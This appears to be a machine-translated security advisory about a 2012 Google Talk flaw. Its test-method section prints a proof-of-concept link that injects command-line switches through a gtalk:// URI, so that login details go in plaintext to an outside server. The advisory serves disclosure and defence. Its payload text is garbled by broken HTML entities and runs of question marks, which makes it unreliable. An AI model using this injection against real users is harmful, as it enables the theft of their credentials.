Google Talk '/gaiaserver' parameter information leakage Vulnerability

Release date: 2012-03-21
Updated on: 2012-03-23

Affected Systems:
Google Talk 1.0.0.105
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52669

Google Talk is a popular instant messaging software that allows direct voice conversations with other computer users.

Google Talk has a security vulnerability. Remote attackers can exploit this vulnerability to obtain sensitive information.

<* Source: rgod (rgod@autistici.org)
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

& Lt; a href = 'gtalk: // mymail@gmail.com ????????????????????????????????????? ?????????????????? "% 20/plaintextauth % 20/gaiaserver % 20www.example.com: 80% 20/nomutex % 20/'& gt; chat with me & lt;/a & gt;

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Google
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.google.com